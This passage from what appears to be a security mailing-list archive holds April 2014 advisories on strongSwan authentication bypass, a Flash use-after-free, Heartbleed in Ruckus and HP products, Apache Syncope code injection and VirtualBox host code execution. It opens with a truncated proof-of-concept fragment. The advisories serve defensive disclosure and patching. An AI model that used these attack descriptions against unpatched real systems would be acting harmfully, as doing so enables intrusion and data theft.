type=submit/form/td/tr/tbody/table PoC: Vulnerable Source script type=text/javascript charset=utf-8 var now = new Date(); $.getJSON(/files?+ now.toString(),
[SECURITY] [DSA 2903-1] strongswan security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2903-1 secur...@debian.org http://www.debian.org/security/ Yves-Alexis Perez April 14, 2014 http://www.debian.org/security/faq - - Package: strongswan CVE ID : CVE-2014-2338 An authentication bypass vulnerability was found in charon, the daemon handling IKEv2 in strongSwan, an IKE/IPsec suite. The state machine handling the security association (IKE_SA) handled some state transitions incorrectly. An attacker can trigger the vulnerability by rekeying an unestablished IKE_SA during the initiation itself. This will trick the IKE_SA state to 'established' without the need to provide any valid credential. Vulnerable setups include those actively initiating IKEv2 IKE_SA (like ”clients” or “roadwarriors”) but also during re-authentication (which can be initiated by the responder). Installations using IKEv1 (pluto daemon in strongSwan 4 and earlier, and IKEv1 code in charon 5.x) is not affected. For the oldstable distribution (squeeze), this problem has been fixed in version 4.4.1-5.5. For the stable distribution (wheezy), this problem has been fixed in version 4.5.2-1.5+deb7u3. For the unstable distribution (sid), this problem has been fixed in version 5.1.2-4. We recommend that you upgrade your strongswan packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBAgAGBQJTS/gCAAoJEBDCk7bDfE42CIMP/jpDobbJt9pO+N6SQY1BKfrn MT1Aly9sb7o4Fz1DbOBJjJ60oXz7aFXSndOyc55DdTNInanXC3sWMfbV31kseiq+ wgRk6zAAgOaxs/uStorK3b8JYQN5NIVDmdd0BCkD5Oo3PGkr1YQyanXtraez7O4e ba3wJYxEuXq7wt/0Y/bt77nAf//tHaJ3vJB0LWXy717E6f3isS+1xMlZLmCu9nAS TMvCrW8XAOmPTJ3PF3AlSnRc+omYRpw3rJcIhS4pC3VA6Y1uYhTnRV3Oy81Y3PgR lEt3m7YNiGbLu+eqN2bb3lRR1Erdl7XAE/WZPcKb8MetC9gQK+gjSmgXcwa49QFh CuUk6rQJzYRoh78FL9LqYPxQNtow+4hPvURVB/wXHTP3ipPvN1/0OmBJU5wlepDF 2d+JZTLov187Rb0yTZG0+TlKykiJiea6r9ZdAYMUOebXtyaaGHQeEwNNlky0RT1k Zf+ptoNPyLQQO3lq03nGlon5nwV1ytM61Hksj9v3cBu9RT2D6mIvzUlpAgdgfwnD UgrePI88J68Layvj/SplVTaq1JtaA3dXZwnLfFBjB859eGSWpbrcn4UFiPkVMIOL ORNv929NhmGONI913Hxkcb96vPJrqorEWKnsm70NyqI8A/oQonnTqhtXXJwh4S2f em1AIItBX/UdJfKHZ+UA =EdFc -END PGP SIGNATURE-
VUPEN Security Research - Adobe Flash ExternalInterface Use-After-Free Code Execution (Pwn2Own)
VUPEN Security Research - Adobe Flash ExternalInterface Use-After-Free Code Execution (Pwn2Own) Website : http://www.vupen.com Twitter : http://twitter.com/vupen I. BACKGROUND - Adobe Flash Player is a cross-platform browser-based application runtime that delivers viewing of expressive applications, content, and videos across screens and browsers. It is installed on 98% of computers. II. DESCRIPTION - VUPEN Vulnerability Research Team discovered a critical vulnerability in Adobe Flash. The vulnerability is caused by a use-after-free error when interacting with the ExternalInterface class from the browser, which could be exploited to achieve code execution via a malicious web page. III. AFFECTED PRODUCTS --- Adobe Flash versions prior to 13.0.0.182 IV. SOLUTION Upgrade to Adobe Flash v13.0.0.182. V. CREDIT -- This vulnerability was discovered by VUPEN Security. VI. ABOUT VUPEN Security --- VUPEN is the leading provider of defensive and offensive cyber security intelligence and advanced zero-day research. All VUPEN's vulnerability intelligence results exclusively from its internal and in-house RD efforts conducted by its team of world-class researchers. VUPEN Solutions: http://www.vupen.com/english/services/ VII. REFERENCES -- http://helpx.adobe.com/security/products/flash-player/apsb14-09.html http://zerodayinitiative.com/advisories/ZDI-14-092/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0506 VIII. DISCLOSURE TIMELINE - 2014-01-28 - Vulnerability Discovered by VUPEN Security 2014-03-13 - Vulnerability Reported to Adobe During Pwn2Own 2014 2014-04-08 - Vulnerability Fixed by Adobe 2014-04-14 - Public disclosure
RUCKUS ADVISORY ID 041414: OpenSSL 1.0.1 library's Heart bleed vulnerability - CVE-2014-0160
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 RUCKUS ADVISORY ID 041414 Customer release date: April 14, 2014 Public release date: April 14, 2014 TITLE OpenSSL 1.0.1 library's Heart bleed vulnerability - CVE-2014-0160 SUMMARY OpenSSL library is used in Ruckus products to implement various security related features. A vulnerability has been discovered in OpenSSL library which may allow an unauthenticated, remote attacker to retrieve memory in chunks of 64 kilobytes from a connected client or server. An exploit could disclose portions of memory containing sensitive security material such as passwords and private keys. AFFECTED SOFTWARE VERSIONS AND DEVICES DeviceAffected software - - -- Smart Cell Gateway 1.1.x SmartCell Access Points NOT AFFECTED ZoneDirector Controllers NOT AFFECTED ZoneFlex Access Points NOT AFFECTED Any products or services not mentioned in the table above are not affected DETAILS A vulnerability has been discovered in the popular OpenSSL cryptographic software library. This weakness exists in OpenSSL's implementation of the TLS/DTLS (transport layer security protocols) heartbeat extension (RFC6520). This vulnerability is due to a missing bounds check in implementation of the handling of the heartbeat extension. When exploited, this issue may lead to leak of memory contents from the server to the client and from the client to the server. These memory contents could contain sensitive security material such as passwords and private keys. IMPACT Ruckus devices incorporate OpenSSL library to implement various security related features. Below is list of the affected components: - - Administrative HTTPS Interface (Port 8443) CVSS v2 Base Score:5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N) WORKAROUNDS Ruckus recommends that all customers apply the appropriate patch(es) as soon as practical. However, in the event that a patch cannot immediately be applied, the following suggestions might help reduce the risk: - Do not expose administrative interfaces of Ruckus devices to untrusted networks such as the Internet. - Use a firewall to limit traffic to/from Ruckus device's administrative interface to trusted hosts. SOLUTION Ruckus recommends that all customers apply the appropriate patch(es) as soon as practical. The following software builds have the fix (any later builds will also have the fix): BranchSoftware Build - ----- 1.1.x1.1.2.0.142 DISCOVERY This vulnerability was disclosed online on various sources : - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 - - https://www.openssl.org/news/secadv_20140407.txt - - http://heartbleed.com/ OBTAINING FIXED FIRMWARE Ruckus customers can contact Ruckus support to obtain the fixed firmware Ruckus Support contact list is at: https://support.ruckuswireless.com/contact-us PUBLIC ANNOUNCEMENTS This security advisory will be made available for public consumption on April 14, 2014 at the following source Ruckus Website http://www.ruckuswireless.com/security SecurityFocus Bugtraq http://www.securityfocus.com/archive/1 Future updates of this advisory, if any, will be placed on Ruckus's website, but may or may not be actively announced on mailing lists. REVISION HISTORY Revision 1.0 / 14th April 2014 / Initial release RUCKUS WIRELESS SECURITY PROCEDURES Complete information on reporting security vulnerabilities in Ruckus Wireless products, obtaining assistance with security incidents is available at http://www.ruckuswireless.com/security For reporting new security issues, email can be sent to security(at)ruckuswireless.com For sensitive information we encourage the use of PGP encryption. Our public keys can be found at http://www.ruckuswireless.com/security STATUS OF THIS NOTICE: Final Although Ruckus cannot guarantee the accuracy of all statements in this advisory, all of the facts have been checked to the best of our ability. Ruckus does not anticipate issuing updated versions of this advisory unless there is some material change in the facts. Should there be a significant change in the facts, Ruckus may update this advisory. (c) Copyright 2014 by Ruckus Wireless This advisory may be redistributed freely after the public release date given at the top of the text, provided that redistributed copies are complete and unmodified, including all date and version information. -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.18 (Darwin) Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEcBAEBAgAGBQJTTBeuAAoJEFH6g5RLqzh1fRsIAJ9MtudIbdzR7mm/hP0i7boN MqlHAnFWai1c99UX048I9PSwWzWuEj4/1E4jy4vQqxLG8gO0YbAQiGq4DDGErCU0 AywV+p3Xlcn0SXp0vse/qnhOT0jVOOKXPZSokmoptQXbd28ZOYtGfMJozTvPh2vf
[SECURITY] CVE-2014-0111 Apache Syncope
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2014-0111: Remote code execution by an authenticated administrator Severity: Important Vendor: The Apache Software Foundation Versions Affected: Syncope 1.0.0 to 1.0.8 Syncope 1.1.0 to 1.1.6 Description: In the various places in which Apache Commons JEXL expressions are allowed (derived schema definition, user / role templates, account links of resource mappings) a malicious administrator can inject Java code that can be executed remotely by the JEE container running the Apache Syncope core. Credit: This issue was discovered by Grégory Draperi. References: http://syncope.apache.org/security.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.14 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQEcBAEBAgAGBQJTTOJyAAoJEGtDE+0nPfKHxWcIAI9POTzr4bIF7fXO25uXgfny BO8SR0fmGScdmeohf8nQZbUNgKA1F7YRe5vC9r8nKFSpdDJrMnPSTOwMYrgdOxHt Rl/SpEab4b8NX0FO1a6TObDbXBDj+Q+4cNUXOOc0jC7lU67n1SorfGaMbjLfcZ0w 2xnZsbAQ0P0bmIJ2mR+LuXLsEA3kwvClF9fUTEDlJ4Rm/yT16UGvD5+vEJdMQzen JhBdT8VeX4wvtYr9+WmmWqeWgvSmezE07s5Pu36qXkxAEFGzdQBtJ/XJbpbgM7Sa 7MoZQHQqJ5VwUVGMseqcxhAjD065uHP41HpAeF4TFQvp4jg8/FiybFdXqiJ+smI= =4XQi -END PGP SIGNATURE-
[security bulletin] HPSBST03001 rev.1 - HP XP P9500 Disk Array running OpenSSL, Remote Disclosure of Information
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04240206 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04240206 Version: 1 HPSBST03001 rev.1 - HP XP P9500 Disk Array running OpenSSL, Remote Disclosure of Information NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2014-04-15 Last Updated: 2014-04-15 Potential Security Impact: Remote disclosure of information Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP XP P9500 Disk Array running OpenSSL.This is the OpenSSL vulnerability known as Heartbleed which could be exploited remotely resulting in disclosure of information. References: CVE-2014-0160, SSRT101506 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP XP P9500 Disk Array OSS 70-06-00/00 and 70-06-01/00 when running Apache 2.2.24 BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2014-0160(AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP is actively working to address this vulnerability for the impacted versions of HP XP P9500 Disk Array. This bulletin will be revised when the software updates are released. The two versions of Apache available in OSS 70-06-00/00 and 70-06-01/00 are: Apache 2.2.10 (with OpenSSL 0.9.8o) which is not impacted by CVE-2014-0160 Apache 2.2.24 (with OpenSSL 1.0.1e) which is impacted by CVE-2014-0160 Until a new version is available, keep the SVP(s) on an array on the earlier version of Apache available from the OSS image (version 2.2.10) HISTORY Version:1 (rev.1) - 15 April 2014 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.19 (GNU/Linux) iEYEARECAAYFAlNNOSEACgkQ4B86/C0qfVl7IwCcCAFossT9cI/G1w8Zjt125fWa wwQAnR+wDpUBjcU/REah/pNV80/+VNeR =Do3J -END PGP SIGNATURE-
[SECURITY] [DSA 2904-1] virtualbox security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2904-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff April 15, 2014 http://www.debian.org/security/faq - - Package: virtualbox CVE ID : CVE-2014-0981 CVE-2014-0983 Francisco Falcon discovered that missing input sanisiting in the 3D acceleration code in VirtualBox could lead to the execution of arbitrary code on the host system. For the oldstable distribution (squeeze), these problems have been fixed in version 3.2.10-dfsg-1+squeeze3. For the stable distribution (wheezy), these problems have been fixed in version 4.1.18-dfsg-2+deb7u3. For the testing distribution (jessie), these problems have been fixed in version 4.3.10-dfsg-1. For the unstable distribution (sid), these problems have been fixed in version 4.3.10-dfsg-1. We recommend that you upgrade your virtualbox packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBAgAGBQJTTUziAAoJEBDCk7bDfE42MekP/Ai1gSHVubS/qQRSGKHEiI6H 6VarynkrRajIvDLZFIZt7Ele6ftbtgsSW43Ih8kYGT/24qBegem4EXtucfpE8F+v beNt1hreLmdRkI2uReJb/0PxvWFtDxG/7RTOu7GgPUQjaKDbNEBt01uNhGUc922F Qnp5U0z4hlGEEOAKc0vTeLvswXEV/vrURE08QMnNLeACwaU7+umAjWj37RpZqZCo 5aD3WNBP/ppj4bgEDUDVLF4S1krTf+okHeMj9wQbOkjv1+uqSTyKNKjB6hzStmsx 83MZBSzPB4ygqUrCVNATJwzq6hDMEA8plq9ykPhRWlXzv9QDihXt+DvDSgR9K/Gw Y6l8ZfFKr0jCKtxmOaNWGf0OjcD2h9xeZjpm4g/j62wVcgpsC47cH5LgE4okRHsX x7l7ajayfjyQMTleYuOj+waW0IHEBVdHX94I3152RFKaylxMNy+lXYjoWOg0+kaI x/umzArnVXMgmntMM9s9jYEthDdaCIzEH5WfXj7JRL+CJOeaAKX3HxeGpB72YDxF mp80h6Q+JECh0691d6IWASiSHKcL4ttw/CyN3WiSIheaSBFiaRBm9CPcLU3sPJIC BcnkviZjV+U0bX8pOlUNLnpOmmL+D+DQ1eVH30x1bpy9XtNyIqr/j7PVRf6n5wIC /R7WTLeveHYYkFdJmr/L =1A2n -END PGP SIGNATURE-
